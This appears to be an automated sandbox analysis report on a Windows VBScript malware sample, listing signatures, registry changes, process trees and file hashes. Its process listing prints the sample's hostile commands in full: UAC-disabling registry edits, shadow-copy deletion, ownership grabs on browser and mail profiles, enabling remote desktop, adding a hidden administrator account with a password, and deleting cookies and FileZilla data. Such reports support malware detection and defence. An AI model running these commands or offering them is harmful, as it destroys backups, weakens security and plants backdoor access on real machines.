Analysis
-
max time kernel
25s -
max time network
50s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
19-10-2022 15:20
Static task
static1
Behavioral task
behavioral1
Sample
57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
Resource
win10v2004-20220901-en
General
-
Target
57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
-
Size
181KB
-
MD5
91f6b90fc19be94b62bb3ec2ff60fc30
-
SHA1
ed92e88998bf8ed11994291fbdcdebf7272249fa
-
SHA256
57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b
-
SHA512
ac874cbc96dcda332b4bc87b2bde9d81c67300e4aaa6315da45016ac5ff45c40505c98c44311f9ef8c1cbed11d58ac29e34b3d0652a19266348f6715ea8104fc
-
SSDEEP
1536:bTRRRRRRRRRRRRRRRRRRRRRRRVjxxxxxxxxxxxxxxxxx96df:bD6F
Malware Config
Signatures
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
Processes:
WScript.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" WScript.exe -
Processes:
reg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" reg.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Adds policy Run key to start application 2 TTPs 4 IoCs
Processes:
WScript.exeSystemProtection.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Updates = "\"C:\\system32\\SystemProtection.exe\" /e:VBScript.Encode \"C:\\kernel\\r00t3r\"" WScript.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run SystemProtection.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Updates = "\"C:\\system32\\SystemProtection.exe\" /e:VBScript.Encode \"C:\\kernel\\r00t3r\"" SystemProtection.exe -
Disables RegEdit via registry modification 4 IoCs
Processes:
WScript.exeWScript.exeWScript.exeSystemProtection.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0" WScript.exe Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0" WScript.exe Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0" WScript.exe Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0" SystemProtection.exe -
Disables Task Manager via registry modification
-
Executes dropped EXE 1 IoCs
Processes:
SystemProtection.exepid process 1936 SystemProtection.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Possible privilege escalation attempt 26 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exepid process 1576 takeown.exe 1752 takeown.exe 1572 takeown.exe 520 takeown.exe 1032 takeown.exe 756 takeown.exe 1100 takeown.exe 784 takeown.exe 1488 icacls.exe 1508 takeown.exe 1984 takeown.exe 1496 takeown.exe 1956 takeown.exe 1520 takeown.exe 1156 icacls.exe 1584 takeown.exe 1632 takeown.exe 2024 takeown.exe 516 takeown.exe 1988 takeown.exe 1564 takeown.exe 1488 icacls.exe 1144 takeown.exe 1204 takeown.exe 2012 takeown.exe 1096 icacls.exe -
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exeattrib.exepid process 1760 attrib.exe 1144 attrib.exe 1920 attrib.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 1452 cmd.exe -
Drops startup file 4 IoCs
Processes:
WScript.exeSystemProtection.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe WScript.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe SystemProtection.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe SystemProtection.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe WScript.exe -
Loads dropped DLL 2 IoCs
Processes:
WScript.exepid process 1064 WScript.exe 1064 WScript.exe -
Modifies file permissions 1 TTPs 26 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exepid process 1096 icacls.exe 756 takeown.exe 1488 icacls.exe 1520 takeown.exe 1156 icacls.exe 1508 takeown.exe 1584 takeown.exe 1100 takeown.exe 1572 takeown.exe 1576 takeown.exe 1144 takeown.exe 1632 takeown.exe 1496 takeown.exe 1752 takeown.exe 784 takeown.exe 1032 takeown.exe 1984 takeown.exe 516 takeown.exe 2012 takeown.exe 1988 takeown.exe 1564 takeown.exe 2024 takeown.exe 520 takeown.exe 1488 icacls.exe 1204 takeown.exe 1956 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
WScript.exeSystemProtection.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WScript.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SystemProtection.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exepid process 2028 vssadmin.exe 2004 vssadmin.exe -
Modifies registry class 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBEFile\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBEFile\DefaultIcon\ = "C:\\Windows\\system32\\shell32.dll,1" reg.exe -
Modifies registry key 1 TTPs 6 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exepid process 1588 reg.exe 1584 reg.exe 1632 reg.exe 932 reg.exe 976 reg.exe 300 reg.exe -
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
vssvc.exetakeown.exedescription pid process Token: SeBackupPrivilege 1436 vssvc.exe Token: SeRestorePrivilege 1436 vssvc.exe Token: SeAuditPrivilege 1436 vssvc.exe Token: SeTakeOwnershipPrivilege 2024 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
WScript.execmd.exeWScript.execmd.execmd.execmd.exedescription pid process target process PID 1064 wrote to memory of 648 1064 WScript.exe cmd.exe PID 1064 wrote to memory of 648 1064 WScript.exe cmd.exe PID 1064 wrote to memory of 648 1064 WScript.exe cmd.exe PID 648 wrote to memory of 1648 648 cmd.exe mode.com PID 648 wrote to memory of 1648 648 cmd.exe mode.com PID 648 wrote to memory of 1648 648 cmd.exe mode.com PID 648 wrote to memory of 1376 648 cmd.exe cmd.exe PID 648 wrote to memory of 1376 648 cmd.exe cmd.exe PID 648 wrote to memory of 1376 648 cmd.exe cmd.exe PID 648 wrote to memory of 1492 648 cmd.exe find.exe PID 648 wrote to memory of 1492 648 cmd.exe find.exe PID 648 wrote to memory of 1492 648 cmd.exe find.exe PID 648 wrote to memory of 592 648 cmd.exe WScript.exe PID 648 wrote to memory of 592 648 cmd.exe WScript.exe PID 648 wrote to memory of 592 648 cmd.exe WScript.exe PID 592 wrote to memory of 1144 592 WScript.exe cmd.exe PID 592 wrote to memory of 1144 592 WScript.exe cmd.exe PID 592 wrote to memory of 1144 592 WScript.exe cmd.exe PID 1144 wrote to memory of 1072 1144 cmd.exe WScript.exe PID 1144 wrote to memory of 1072 1144 cmd.exe WScript.exe PID 1144 wrote to memory of 1072 1144 cmd.exe WScript.exe PID 1144 wrote to memory of 1588 1144 cmd.exe reg.exe PID 1144 wrote to memory of 1588 1144 cmd.exe reg.exe PID 1144 wrote to memory of 1588 1144 cmd.exe reg.exe PID 1144 wrote to memory of 1584 1144 cmd.exe reg.exe PID 1144 wrote to memory of 1584 1144 cmd.exe reg.exe PID 1144 wrote to memory of 1584 1144 cmd.exe reg.exe PID 648 wrote to memory of 1632 648 cmd.exe reg.exe PID 648 wrote to memory of 1632 648 cmd.exe reg.exe PID 648 wrote to memory of 1632 648 cmd.exe reg.exe PID 648 wrote to memory of 756 648 cmd.exe find.exe PID 648 wrote to memory of 756 648 cmd.exe find.exe PID 648 wrote to memory of 756 648 cmd.exe find.exe PID 648 wrote to memory of 2028 648 cmd.exe vssadmin.exe PID 648 wrote to memory of 2028 648 cmd.exe vssadmin.exe PID 648 wrote to memory of 2028 648 cmd.exe vssadmin.exe PID 1064 wrote to memory of 1520 1064 WScript.exe cmd.exe PID 1064 wrote to memory of 1520 1064 WScript.exe cmd.exe PID 1064 wrote to memory of 1520 1064 WScript.exe cmd.exe PID 1064 wrote to memory of 1452 1064 WScript.exe cmd.exe PID 1064 wrote to memory of 1452 1064 WScript.exe cmd.exe PID 1064 wrote to memory of 1452 1064 WScript.exe cmd.exe PID 1520 wrote to memory of 2012 1520 cmd.exe takeown.exe PID 1520 wrote to memory of 2012 1520 cmd.exe takeown.exe PID 1520 wrote to memory of 2012 1520 cmd.exe takeown.exe PID 1452 wrote to memory of 1700 1452 cmd.exe cmd.exe PID 1452 wrote to memory of 1700 1452 cmd.exe cmd.exe PID 1452 wrote to memory of 1700 1452 cmd.exe cmd.exe PID 1452 wrote to memory of 1748 1452 cmd.exe reg.exe PID 1452 wrote to memory of 1748 1452 cmd.exe reg.exe PID 1452 wrote to memory of 1748 1452 cmd.exe reg.exe PID 1520 wrote to memory of 1988 1520 cmd.exe takeown.exe PID 1520 wrote to memory of 1988 1520 cmd.exe takeown.exe PID 1520 wrote to memory of 1988 1520 cmd.exe takeown.exe PID 1452 wrote to memory of 1184 1452 cmd.exe xcopy.exe PID 1452 wrote to memory of 1184 1452 cmd.exe xcopy.exe PID 1452 wrote to memory of 1184 1452 cmd.exe xcopy.exe PID 1520 wrote to memory of 1676 1520 cmd.exe cacls.exe PID 1520 wrote to memory of 1676 1520 cmd.exe cacls.exe PID 1520 wrote to memory of 1676 1520 cmd.exe cacls.exe PID 1452 wrote to memory of 1160 1452 cmd.exe xcopy.exe PID 1452 wrote to memory of 1160 1452 cmd.exe xcopy.exe PID 1452 wrote to memory of 1160 1452 cmd.exe xcopy.exe PID 1520 wrote to memory of 1464 1520 cmd.exe cacls.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
WScript.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\sdate WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\sdate\sdate = "33" WScript.exe -
Views/modifies file attributes 1 TTPs 4 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exepid process 1588 attrib.exe 1144 attrib.exe 1920 attrib.exe 1760 attrib.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs"1⤵
- Adds policy Run key to start application
- Disables RegEdit via registry modification
- Drops startup file
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\uac.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mode.commode con lines=1 cols=143⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "3⤵
-
C:\Windows\system32\find.exefind /i "version 6.1."3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ADMIN.vbe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c"C:\Users\Admin\AppData\Local\Temp\CPBA.bat"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tp.vbe"5⤵
- Disables RegEdit via registry modification
-
C:\Windows\system32\reg.exereg add hklm\software\microsoft\windows\currentversion\policies\system /v consentpromptbehavioradmin /t reg_dword /d 0 /f5⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\system32\reg.exereg add hklm\software\microsoft\windows\currentversion\policies\system /v enablelua /t reg_dword /d 0 /f5⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\system32\reg.exereg query hklm\software\microsoft\windows\currentversion\policies\system /v enablelua3⤵
- Modifies registry key
-
C:\Windows\system32\find.exefind /i "0x0"3⤵
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K takeown /F C:\kernel /A /R /D O & takeown /F C:\system32 /A /R /D O & CACLS C:\Kernel /E /T /C /G Admin:F & CACLS C:\system32 /E /T /C /G Admin:F & takeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O & takeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Skype" /A /R /D O & takeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O & takeown /F "%userproflie%\cookies" /A /R /D O & takeown /F "C:\Windows\system32\drivers" /A /R /D O & takeown /a /f C:\Windows\System32\wscript.exe & ICACLS C:\Windows\System32\wscript.exe /Grant Admin:F & takeown /a /f C:\Windows\System32\drivers\flpydisk.sys & ICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F & EXIT2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /F C:\kernel /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F C:\system32 /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cacls.exeCACLS C:\Kernel /E /T /C /G Admin:F3⤵
-
C:\Windows\system32\cacls.exeCACLS C:\system32 /E /T /C /G Admin:F3⤵
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Skype" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "%userproflie%\cookies" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\system32\drivers" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /a /f C:\Windows\System32\wscript.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeICACLS C:\Windows\System32\wscript.exe /Grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /a /f C:\Windows\System32\drivers\flpydisk.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp.bat" "2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type "C:\system32\blood.dat"3⤵
-
C:\Windows\system32\reg.exereg add "HKCR\VBEFile\DefaultIcon" /v "" /t "REG_SZ" /d "C:\Windows\system32\shell32.dll,1" /f3⤵
- Modifies registry class
-
C:\Windows\system32\xcopy.exexcopy /C /H /Y /R "C:\kernel\*.vbe" "C:\Users\Admin\AppData\Local\Temp\"3⤵
-
C:\Windows\system32\xcopy.exexcopy /C /H /Y /R "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbe" "C:\Users\Admin\AppData\Local\Temp\"3⤵
-
C:\Windows\system32\xcopy.exexcopy /C /H /Y /R "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs" "C:\Users\Admin\AppData\Local\Temp\"3⤵
-
C:\Windows\system32\attrib.exeattrib -s -h "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\system32"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\kernel"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\system32\xcopy.exexcopy /C /H /Y /R "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs" "C:\system32\"3⤵
-
C:\Windows\system32\xcopy.exexcopy /C /H /Y /R "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs" "C:\kernel\"3⤵
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\kernel\r00t3r"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmp.vbe"2⤵
-
C:\system32\SystemProtection.exe"C:\system32\SystemProtection.exe" /e:VBScript.Encode "C:\system32\blood.dat2⤵
- Adds policy Run key to start application
- Disables RegEdit via registry modification
- Executes dropped EXE
- Drops startup file
- Checks whether UAC is enabled
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\uac.bat" "3⤵
-
C:\Windows\system32\mode.commode con lines=1 cols=144⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "4⤵
-
C:\Windows\system32\find.exefind /i "version 6.1."4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ADMIN.vbe"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c"C:\Users\Admin\AppData\Local\Temp\CPBA.bat"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tp.vbe"6⤵
- Disables RegEdit via registry modification
-
C:\Windows\system32\reg.exereg add hklm\software\microsoft\windows\currentversion\policies\system /v consentpromptbehavioradmin /t reg_dword /d 0 /f6⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\system32\reg.exereg add hklm\software\microsoft\windows\currentversion\policies\system /v enablelua /t reg_dword /d 0 /f6⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\system32\reg.exereg query hklm\software\microsoft\windows\currentversion\policies\system /v enablelua4⤵
- Modifies registry key
-
C:\Windows\system32\find.exefind /i "0x0"4⤵
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K takeown /F C:\kernel /A /R /D O & takeown /F C:\system32 /A /R /D O & CACLS C:\Kernel /E /T /C /G Admin:F & CACLS C:\system32 /E /T /C /G Admin:F & takeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O & takeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Skype" /A /R /D O & takeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O & takeown /F "%userproflie%\cookies" /A /R /D O & takeown /F "C:\Windows\system32\drivers" /A /R /D O & takeown /a /f C:\Windows\System32\wscript.exe & ICACLS C:\Windows\System32\wscript.exe /Grant Admin:F & takeown /a /f C:\Windows\System32\drivers\flpydisk.sys & ICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F & EXIT3⤵
-
C:\Windows\system32\takeown.exetakeown /F C:\kernel /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F C:\system32 /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cacls.exeCACLS C:\Kernel /E /T /C /G Admin:F4⤵
-
C:\Windows\system32\cacls.exeCACLS C:\system32 /E /T /C /G Admin:F4⤵
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Skype" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "%userproflie%\cookies" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\system32\drivers" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /a /f C:\Windows\System32\wscript.exe4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeICACLS C:\Windows\System32\wscript.exe /Grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /a /f C:\Windows\System32\drivers\flpydisk.sys4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp.bat" "3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type "C:\system32\blood.dat"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmp.vbe"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sdf.vbs"3⤵
- Modifies visiblity of hidden/system files in Explorer
-
C:\Windows\system32\cmd.execmd /c ""C:\system32\bkr.bat" "3⤵
-
C:\Windows\system32\netsh.exenetsh firewall set service type=remotedesktop mode=enable scope=all4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\system32\net.exenet user timalin /delete4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user timalin /delete5⤵
-
C:\Windows\system32\net.exenet user NTUSER /delete4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user NTUSER /delete5⤵
-
C:\Windows\system32\net.exenet user /add HelpAssistant jevoussalue4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add HelpAssistant jevoussalue5⤵
-
C:\Windows\system32\net.exenet localgroup Administrators /add NTUSER4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators /add NTUSER5⤵
-
C:\Windows\system32\net.exenet localgroup Administrateurs /add NTUSER4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v HelpAssistant /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin" & rd/q/s Windows & rd/q/s s4t4n & rd/q/s Microsoft & rd/q/s Securities & cd/d C:\Windows\system32\drivers & ren flpydisk.sys flpydisk.sy_ & del/f/q/a C:\system\*.* & EXIT3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K CD/D "C:\Users\Admin\COOKIES" & Del/f/q/a *.* & EXIT3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin\Application Data\Skype" & rd/s/q "C:\Users\Admin\Application Data\Skype" & EXIT3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin\AppData\Roaming\opera" & del/f/q opera & EXIT3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin\AppData\Roaming\FileZilla" & del/f/q sitemanager.xml & EXIT3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K cd/d "C:\system32" & echo done >>"C:\system32\r0k.rk" & EXIT2⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrateurs /add NTUSER1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Hidden Files and Directories
3Account Manipulation
1Registry Run Keys / Startup Folder
1Modify Existing Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\ADMIN.vbeFilesize
292B
MD5e11a368aaa023ac803dff823cc918920
SHA13ddb356f147922b4b21068d9c69b9452e437a15c
SHA256037bb39265049b2a383508cefd884ef81a3f25d85f039fae7d92a38fc3f02518
SHA512c7d4dd593f1872eaf3e03f71495c3328a888fbed9c0adb81d56aef08f6c192e14b787063b146eedefdd35ef2d659ef45ea76c499ea819171c763d97c6cfd4a5d
-
C:\Users\Admin\AppData\Local\Temp\ADMIN.vbeFilesize
292B
MD5e11a368aaa023ac803dff823cc918920
SHA13ddb356f147922b4b21068d9c69b9452e437a15c
SHA256037bb39265049b2a383508cefd884ef81a3f25d85f039fae7d92a38fc3f02518
SHA512c7d4dd593f1872eaf3e03f71495c3328a888fbed9c0adb81d56aef08f6c192e14b787063b146eedefdd35ef2d659ef45ea76c499ea819171c763d97c6cfd4a5d
-
C:\Users\Admin\AppData\Local\Temp\CPBA.batFilesize
345B
MD523e76ff91ef416f250a82af89a02769c
SHA13429cc2b37e993bab32a7840618f0c17d9a091e6
